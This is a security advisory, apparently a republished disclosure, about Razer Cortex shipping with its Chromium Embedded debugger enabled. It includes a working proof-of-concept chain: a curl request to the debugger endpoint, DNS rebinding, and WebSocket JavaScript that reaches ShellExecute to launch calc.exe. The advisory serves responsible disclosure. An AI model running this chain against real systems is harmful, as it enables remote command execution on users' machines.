Razer Cortex Debugger Remote Command Execution

2018.12.18
us Tavis Ormandy (US) us
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

Razer "Cortex" has CEF debugger stub enabled by default allowing arbitrary remote command execution. I was alerted on twitter that the software distributed by Razer for their gaming equipment might be unsafe, I downloaded the ones I could see online to take a look. I have only looked at "Cortex", apparently some kind of system optimizer (frankly, the claims it makes seem dubious). Cortex is a CEF (Chromium Embedded) application, and unbelievably they left the debugger running and enabled by default in production builds. $ curl -si localhost:8088/json/list HTTP/1.1 200 OK Content-Length:2094 Content-Type:application/json; charset=UTF-8 [ { "description": "", "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)", "id": "(A6E5587C41694A59DB4142D98362B4CA)", "title": "Razer Game Deals - The best game deals on the web", "type": "page", "url": "<a href="https://deals.razer.com/?From=cortex&Userid=..." title="" class="" rel="nofollow">https://deals.razer.com/?From=cortex&Userid=...</a>", "webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)" } ] That is obviously exploitable, but the mechanics are pretty tricky. Razer ship a module called RazerCortex.Modules.Deals.JsInteractions in RazerCortex.Modules.Deals.dll that contains a method JSOutBrowser.open(), that is passed directly to ShellExecute(), so you can use it for command execution. 1. Read the list of pages using DNS rebinding from <a href="http://localhost:8088/json/list" title="" class="" rel="nofollow">http://localhost:8088/json/list</a> 2. Open a WebSocket to the webSocketDebuggerUrl listed. Do something like: x = new WebSocket("ws://localhost:8088/devtools/page/(EBC04DF125124EC6E07D8CEA8A0470E8)") x.send(JSON.stringify({"id":1,"method":"Runtime.enable"})) // Enable javascript evaluation x.send(JSON.stringify({"id":2,"method":"Runtime.evaluate","params":{"expression":"RazerCortexOutBrowser.open(JSON.stringify({url: \"c:\\\\windows\\\\system32\\\\calc.exe\"}))"}})) // Run arbitrary commands. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: taviso


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top